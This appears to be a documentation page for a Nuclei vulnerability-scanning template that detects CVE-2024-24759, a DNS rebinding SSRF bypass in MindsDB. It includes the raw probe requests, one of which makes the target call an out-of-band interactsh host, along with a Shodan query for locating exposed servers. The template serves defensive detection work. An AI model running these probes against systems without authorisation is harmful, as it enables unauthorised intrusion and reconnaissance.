Skip to content

MindsDB -DNS Rebinding SSRF Protection Bypass

ID: CVE-2024-24759

Severity: high

Author: Lee Changhyun(eeche)

Tags: cve,cve2024,mindsdb,ssrf,dns-rebinding,oast

Detects DNS rebinding vulnerability that allows bypass of SSRF protection. The vulnerability exists in the URL validation mechanism where DNS resolution is performed without considering DNS rebinding attacks.

id: CVE-2024-24759
info:
name: MindsDB -DNS Rebinding SSRF Protection Bypass
author: Lee Changhyun(eeche)
severity: high
description: |
Detects DNS rebinding vulnerability that allows bypass of SSRF protection. The vulnerability exists in the URL validation mechanism where DNS resolution is performed without considering DNS rebinding attacks.
impact: |
SSRF Protection Bypass via DNS Rebinding
remediation: |
Upgrade to mindsdb version 23.12.4.2 or later
reference:
- https://github.com/advisories/GHSA-4jcv-vp96-94xr
- https://nvd.nist.gov/vuln/detail/CVE-2024-24759
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
cvss-score: 9.1
cve-id: CVE-2024-24759
cwe-id: CWE-918
epss-score: 0.00084
epss-percentile: 0.37577
cpe: cpe:2.3:a:mindsdb:mindsdb:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: mindsdb
product: mindsdb
shodan-query: title:"mindsdb"
tags: cve,cve2024,mindsdb,ssrf,dns-rebinding,oast
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "mindsdb")'
internal: true
- raw:
- |
GET /check_private_url?url=https://{{interactsh-url}}/ HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
# digest: 490a004630440220418db07c38f19e1d91a08422f4464b4c9821bf5e212f435ae9ae76f5fc2c705c02201225df5821c320e6b9a3b03418dae907e83ab09711488d8dbb39da37ed63d256:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-24759.yaml"

View on Github